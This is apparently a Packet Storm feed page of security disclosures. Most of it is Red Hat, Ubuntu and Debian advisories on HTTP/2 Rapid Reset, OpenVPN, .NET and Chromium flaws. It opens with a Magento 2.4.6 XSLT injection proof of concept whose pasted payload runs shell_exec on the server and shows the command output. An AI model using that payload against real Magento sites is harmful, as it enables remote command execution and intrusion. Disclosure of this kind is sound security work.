Magento version 2.4.6 suffers from an XSLT server side injection vulnerability that allows for remote command execution.

    Exploit Title: Magento ver. 2.4.6 - XSLT Server Side Injection# Date: 2023-11-17# Exploit Author: tmrswrr# Vendor Homepage: https://magento2demo.firebearstudio.com/# Software Link:  https://github.com/magento/magento2/archive/refs/tags/2.4.6-p3.zip# Version: 2.4.6# Tested on: 2.4.6POC:1 ) Enter with admin creds this url : https://magento2demo.firebearstudio.com/2 ) Click SYSTEM > Import Jobs > Entity Type Widget > click edit 3 ) Click XSLT Configuration  and write this payload : <?xml version="1.0" encoding="utf-8"?><xsl:stylesheet version="1.0"xmlns:xsl="http://www.w3.org/1999/XSL/Transform"xmlns:php="http://php.net/xsl" ><xsl:template match="/"><xsl:value-of select="php:function('shell_exec','id')" /></xsl:template></xsl:stylesheet>4 ) Click Test XSL Template , You will be see "id" command result :<?xml version="1.0"?>uid=10095(a0563af8) gid=1050(a0563af8) groups=1050(a0563af8)

Magento 2.4.6 XSLT Server Side Injection / Command Execution

Red Hat Security Advisory 2023-7342-01 - An update for cnf-tests-container, dpdk-base-container and performance-addon-operator-must-gather-rhel8-container is now available for Red Hat OpenShift Container Platform 4.11. Secondary scheduler builds and numaresources-operator are also available for technical preview with this release, however they are not intended for production.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7342.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenShift Container Platform 4.11 low-latency extras update  
Advisory ID:        RHSA-2023:7342-01  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:7342  
Issue date:         2023-11-16  
Revision:           01  
CVE Names:          CVE-2023-39325  
====================================================================

Summary: 

An update for cnf-tests-container, dpdk-base-container and performance-addon-operator-must-gather-rhel8-container is now available for Red Hat OpenShift Container Platform 4.11. Secondary scheduler builds and numaresources-operator are also available for technical preview with this release, however they are not intended for production.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

Security Fix(es):

* golang: net/http, x/net/http2: rapid stream resets can cause excessive work (Rapid Reset Attack) (CVE-2023-39325)

A Red Hat Security Bulletin which addresses further details about the Rapid Reset flaw is available in the References section.

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

This advisory contains the extra low-latency container images for Red Hat OpenShift Container Platform 4.11. See the following advisory for the container images for this release:

https://access.redhat.com/errata/RHSA-2023:5697

All OpenShift Container Platform users are advised to upgrade to these updated packages and images.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-39325

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-003  
https://bugzilla.redhat.com/show_bug.cgi?id=2243296

Red Hat Security Advisory 2023-7342-01

Red Hat Security Advisory 2023-7335-01 - An update is now available for Red Hat Process Automation Manager including images for Red Hat OpenShift Container Platform. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7335.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Updated Red Hat Process Automation Manager 7.13.4 SP2 Images  
Advisory ID:        RHSA-2023:7335-01  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:7335  
Issue date:         2023-11-16  
Revision:           01  
CVE Names:          CVE-2023-44487  
====================================================================

Summary: 

An update is now available for Red Hat Process Automation Manager including images for Red Hat OpenShift Container Platform.

Description:

Red Hat Process Automation Manager is an open source business process management suite that combines process management and decision service management and enables business and IT users to create, manage, validate, and deploy process applications and decision services.

This release includes security fixes.

Security Fix(es):

* netty-codec-http2: HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)

* undertow: HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)

* Quarkus: HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)

* EAP XP: HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)

* EAP: HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)

* businessautomation-operator: HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)

A Red Hat Security Bulletin which addresses further details about this flaw is available in the References section.

For more details about the security issues, including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE pages listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-44487

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2242803

Red Hat Security Advisory 2023-7335-01

Red Hat Security Advisory 2023-7334-01 - An update for rh-varnish6-varnish is now available for Red Hat Software Collections. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7334.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: rh-varnish6-varnish security updateAdvisory ID:        RHSA-2023:7334-01Product:            Red Hat Software CollectionsAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7334Issue date:         2023-11-16Revision:           01CVE Names:          CVE-2023-44487====================================================================Summary: An update for rh-varnish6-varnish is now available for Red Hat Software Collections.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Varnish Cache is a high-performance HTTP accelerator. It stores web pages in memory so web servers don't have to create the same web page over and over again, giving the website a significant speed up.Security Fix(es):* HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-44487References:https://access.redhat.com/security/updates/classification/#importanthttps://access.redhat.com/security/vulnerabilities/RHSB-2023-003https://bugzilla.redhat.com/show_bug.cgi?id=2242803

Red Hat Security Advisory 2023-7334-01

Red Hat Security Advisory 2023-6842-01 - Red Hat OpenShift Container Platform release 4.12.43 is now available with updates to packages and images that fix several bugs and add enhancements.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_6842.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenShift Container Platform 4.12.43 bug fix and security update  
Advisory ID:        RHSA-2023:6842-01  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:6842  
Issue date:         2023-11-16  
Revision:           01  
CVE Names:          CVE-2023-5408  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.12.43 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.12.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.12.43. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHBA-2023:6844

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

Security Fix(es):

* golang: net/http, x/net/http2: rapid stream resets can cause excessive work (CVE-2023-44487) (CVE-2023-39325)

* OpenShift: modification of node role labels (CVE-2023-5408)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.  
All OpenShift Container Platform 4.12 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.12/updating/updating-cluster-cli.html

Solution:

CVEs:

CVE-2023-5408

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-003  
https://bugzilla.redhat.com/show_bug.cgi?id=2242173  
https://bugzilla.redhat.com/show_bug.cgi?id=2243296  
https://issues.redhat.com/browse/OCPBUGS-18951  
https://issues.redhat.com/browse/OCPBUGS-19382  
https://issues.redhat.com/browse/OCPBUGS-20071  
https://issues.redhat.com/browse/OCPBUGS-20583  
https://issues.redhat.com/browse/OCPBUGS-22408  
https://issues.redhat.com/browse/OCPBUGS-22461  
https://issues.redhat.com/browse/OCPBUGS-22719  
https://issues.redhat.com/browse/OCPBUGS-22843  
https://issues.redhat.com/browse/OCPBUGS-23037  
https://issues.redhat.com/browse/OCPBUGS-7768

Red Hat Security Advisory 2023-6842-01

Red Hat Security Advisory 2023-6841-01 - An update is now available for Red Hat OpenShift Container Platform 4.12.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_6841.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Red Hat OpenShift Enterprise security update  
Advisory ID:        RHSA-2023:6841-01  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:6841  
Issue date:         2023-11-16  
Revision:           01  
CVE Names:          CVE-2023-39325  
====================================================================

Summary: 

An update is now available for Red Hat OpenShift Container Platform 4.12.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.12.43. See the following advisory for the container images for this release:

https://access.redhat.com/errata/RHSA-2023:6842

Security Fix(es):

* golang: net/http, x/net/http2: rapid stream resets can cause excessive work (Rapid Reset Attack) (CVE-2023-39325)

A Red Hat Security Bulletin which addresses further details about the Rapid Reset flaw is available in the References section.

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://docs.openshift.com/container-platform/4.12/updating/updating-cluster-cli.html

https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

CVEs:

CVE-2023-39325

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-003  
https://bugzilla.redhat.com/show_bug.cgi?id=2243296

Red Hat Security Advisory 2023-6841-01

Ubuntu Security Notice 6484-1 - It was discovered that OpenVPN incorrectly handled the --fragment option in certain configurations. A remote attacker could possibly use this issue to cause OpenVPN to crash, resulting in a denial of service. It was discovered that OpenVPN incorrectly handled certain memory operations. A remote attacker could use this issue to cause OpenVPN to crash, obtain sensitive information, or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6484-1November 16, 2023openvpn vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.10- Ubuntu 23.04Summary:Several security issues were fixed in OpenVPN.Software Description:- openvpn: virtual private network softwareDetails:It was discovered that OpenVPN incorrectly handled the --fragment optionin certain configurations. A remote attacker could possibly use this issueto cause OpenVPN to crash, resulting in a denial of service.(CVE-2023-46849)It was discovered that OpenVPN incorrectly handled certain memoryoperations. A remote attacker could use this issue to cause OpenVPN tocrash, obtain sensitive information, or possibly execute arbitrary code.(CVE-2023-46850)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.10:   openvpn                         2.6.5-0ubuntu1.1Ubuntu 23.04:   openvpn                         2.6.1-1ubuntu1.1In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6484-1   CVE-2023-46849, CVE-2023-46850Package Information:   https://launchpad.net/ubuntu/+source/openvpn/2.6.5-0ubuntu1.1   https://launchpad.net/ubuntu/+source/openvpn/2.6.1-1ubuntu1.1

Ubuntu Security Notice USN-6484-1

Debian Linux Security Advisory 5556-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5556-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonNovember 15, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-5997 CVE-2023-6112Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the oldstable distribution (bullseye), these problems have been fixedin version 119.0.6045.159-1~deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 119.0.6045.159-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmVVT/UACgkQZF0CR8NudjfQZw//bJoI/QaSlCksKVM/OBj1flTAddPBNLyLxnxhIgRFk8hAWKXZfncSMt7PRfnkbzEHMxWjPmCFf3G1MnpHxI8TEMD9Ry8mmTQ/ZwZd04JYUQ6bGHKmCh6EwT/ipFpw76Xaym/CfCsrSVa+z7VclQ+S8KumbGknuJN87H0SyxwaP2khP/T/c9v1IY2qq5tJLYOAKMN+Sadex9U3+kjHScx3bBBD8OJ/PGV16X+NxctQ0bdQPVfTlXbmkiQhMnp8c4bxkgNNFV0W1AlYzUWPcIyDgJjcuR0lowEUGkT0awq23HavlA50abiUYDVP15RBkY75c0eyB4/UgP71UjUHvm23ztcaozNl0/YIUVvqMF47toydCEkrUzv6jRBCQVkAeMd3y1CQMYu/CF0U7uwrElelAVxVo0Al24G1fbjAdS5xTHe8TOJg1s5e0uts38kUzT0ESj8a0D3swjnt8AHkrJQN6bN4x9PinZPTQN9gLKdbw9vDaWOhAx3VWdfl2Pscscu+18B3GbCWtZE904rPyb6vRrHYTtCHMSzxPCrvKVSjoI28zawXhJY+eDY6Tepm6ewP2AG3oRc9/8RhBDaEnUAz+Dd4GyTTv260a2N5xnZyfuiIRv/DR0M1jhzTuJQokpfxzXQwxvgS9oMwW9WAZWJWfug7nPKuSruHbLzKlHheqKI==eZ05-----END PGP SIGNATURE-----

Debian Security Advisory 5556-1

Ubuntu Security Notice 6480-1 - Barry Dorrans discovered that .NET did not properly implement certain security features for Blazor server forms. An attacker could possibly use this issue to bypass validation, which could trigger unintended actions. Piotr Bazydlo discovered that .NET did not properly handle untrusted URIs provided to System.Net.WebRequest.Create. An attacker could possibly use this issue to inject arbitrary commands to backend FTP servers.

==========================================================================  
Ubuntu Security Notice USN-6480-1  
November 15, 2023

dotnet6, dotnet7, dotnet8 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 23.04  
- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in .NET.

Software Description:  
- dotnet6: dotNET CLI tools and runtime  
- dotnet7: dotNET CLI tools and runtime  
- dotnet8: dotNET CLI tools and runtime

Details:

Barry Dorrans discovered that .NET did not properly implement certain  
security features for Blazor server forms. An attacker could possibly  
use this issue to bypass validation, which could trigger unintended  
actions. (CVE-2023-36558)

Piotr Bazydlo discovered that .NET did not properly handle untrusted  
URIs provided to System.Net.WebRequest.Create. An attacker could possibly  
use this issue to inject arbitrary commands to backend FTP servers.  
(CVE-2023-36049)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
   aspnetcore-runtime-6.0          6.0.125-0ubuntu1~23.10.1  
   aspnetcore-runtime-7.0          7.0.114-0ubuntu1~23.10.1  
   aspnetcore-runtime-8.0          8.0.0-0ubuntu1~23.10.1  
   dotnet-host                     6.0.125-0ubuntu1~23.10.1  
   dotnet-host-7.0                 7.0.114-0ubuntu1~23.10.1  
   dotnet-host-8.0                 8.0.0-0ubuntu1~23.10.1  
   dotnet-hostfxr-6.0              6.0.125-0ubuntu1~23.10.1  
   dotnet-hostfxr-7.0              7.0.114-0ubuntu1~23.10.1  
   dotnet-hostfxr-8.0              8.0.0-0ubuntu1~23.10.1  
   dotnet-runtime-6.0              6.0.125-0ubuntu1~23.10.1  
   dotnet-runtime-7.0              7.0.114-0ubuntu1~23.10.1  
   dotnet-runtime-8.0              8.0.0-0ubuntu1~23.10.1  
   dotnet-sdk-6.0                  6.0.125-0ubuntu1~23.10.1  
   dotnet-sdk-7.0                  7.0.114-0ubuntu1~23.10.1  
   dotnet-sdk-8.0                  8.0.100-0ubuntu1~23.10.1  
   dotnet6                         6.0.125-0ubuntu1~23.10.1  
   dotnet7                         7.0.114-0ubuntu1~23.10.1  
   dotnet8                         8.0.100-8.0.0-0ubuntu1~23.10.1

Ubuntu 23.04:  
   aspnetcore-runtime-6.0          6.0.125-0ubuntu1~23.04.1  
   aspnetcore-runtime-7.0          7.0.114-0ubuntu1~23.04.1  
   dotnet-host                     6.0.125-0ubuntu1~23.04.1  
   dotnet-host-7.0                 7.0.114-0ubuntu1~23.04.1  
   dotnet-hostfxr-6.0              6.0.125-0ubuntu1~23.04.1  
   dotnet-hostfxr-7.0              7.0.114-0ubuntu1~23.04.1  
   dotnet-runtime-6.0              6.0.125-0ubuntu1~23.04.1  
   dotnet-runtime-7.0              7.0.114-0ubuntu1~23.04.1  
   dotnet-sdk-6.0                  6.0.125-0ubuntu1~23.04.1  
   dotnet-sdk-7.0                  7.0.114-0ubuntu1~23.04.1  
   dotnet6                         6.0.125-0ubuntu1~23.04.1  
   dotnet7                         7.0.114-0ubuntu1~23.04.1

Ubuntu 22.04 LTS:  
   aspnetcore-runtime-6.0          6.0.125-0ubuntu1~22.04.1  
   aspnetcore-runtime-7.0          7.0.114-0ubuntu1~22.04.1  
   dotnet-host                     6.0.125-0ubuntu1~22.04.1  
   dotnet-host-7.0                 7.0.114-0ubuntu1~22.04.1  
   dotnet-hostfxr-6.0              6.0.125-0ubuntu1~22.04.1  
   dotnet-hostfxr-7.0              7.0.114-0ubuntu1~22.04.1  
   dotnet-runtime-6.0              6.0.125-0ubuntu1~22.04.1  
   dotnet-runtime-7.0              7.0.114-0ubuntu1~22.04.1  
   dotnet-sdk-6.0                  6.0.125-0ubuntu1~22.04.1  
   dotnet-sdk-7.0                  7.0.114-0ubuntu1~22.04.1  
   dotnet6                         6.0.125-0ubuntu1~22.04.1  
   dotnet7                         7.0.114-0ubuntu1~22.04.1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6480-1  
   CVE-2023-36049, CVE-2023-36558

Package Information:  
https://launchpad.net/ubuntu/+source/dotnet6/6.0.125-0ubuntu1~23.10.1  
https://launchpad.net/ubuntu/+source/dotnet7/7.0.114-0ubuntu1~23.10.1  
https://launchpad.net/ubuntu/+source/dotnet8/8.0.100-8.0.0-0ubuntu1~23.10.1  
https://launchpad.net/ubuntu/+source/dotnet6/6.0.125-0ubuntu1~23.04.1  
https://launchpad.net/ubuntu/+source/dotnet7/7.0.114-0ubuntu1~23.04.1  
https://launchpad.net/ubuntu/+source/dotnet6/6.0.125-0ubuntu1~22.04.1  
https://launchpad.net/ubuntu/+source/dotnet7/7.0.114-0ubuntu1~22.04.1

Ubuntu Security Notice USN-6480-1

Debian Linux Security Advisory 5555-1 - Two vulnerabilities were discovered in openvpn, a virtual private network application which could result in memory disclosure or denial of service.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5555-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
November 15, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : openvpn  
CVE ID         : CVE-2023-46849 CVE-2023-46850

Two vulnerabilities were discovered in openvpn, a virtual private  
network application which could result in memory disclosure or denial  
of service.

   The oldstable distribution (bullseye) is not affected.

For the stable distribution (bookworm), these problems have been fixed in  
version 2.6.3-1+deb12u2.

We recommend that you upgrade your openvpn packages.

For the detailed security status of openvpn please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/openvpn

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmVVGAAACgkQEMKTtsN8  
TjZneg//bSgv5wdYUyFUWMI0hIYO/uV7bSCpUoJa6RG7BlPQ5zihVq6kw5MA+Dq2  
psZYDGcQZwM7Dne+bYChAFBL7+QrXLANLrZVHKyOeA5gRpDvlquGNR4D3ZloMVIt  
xdWpmHPAutHdWdTifZ390toJCWKKZTPRvxrohiirHVIQH03VYCFCupJYyZTFMOes  
vfz1t6wPoiAGlPvAkMXBHzCPAkRjOcz6S01V/dQPQbvo6oW9MNHCT+Upfj0M74rV  
Z9v8fpbnXzonoNoIDm7YQud+fIEDIr63m2kB0M31qO8jdWsvLrBgtseX6VO5Ni03  
UBeDAPTId8foPomxvhvl/8jcoMF/u3N3tivR2n9pV3vZKN1c08cH2vYnlal2Q9i+  
5W2EDoshUKHbMznmDsB98ByOglVK671mAyyb5ycfb3deXnpYX3fDWSBCBBBzKTgX  
W7xSSK0gFb/GLaHl7vmK4bjKv0qrTBDlEX+d84lI6f+zYwOBFyU+u3fITyKPCMp8  
SqPUfdNg77Ijco7YKZdofi9U549uqqKW8dT5HMZglo8yG1H8w/7LFG+Df8hZ+dp4  
qJQ7tYBEZP8J4XlY1btaPE6F9JKqZSkvUW5jPmFNzfU/Apb0b0dvnfFRr0/BhkFL  
0fYxClI1C61qRavE+mqYjt1o9+IwZdS6tBxReZG15D+XoMvdFf0=  
=8EOr  
-----END PGP SIGNATURE-----

Source

Packet Storm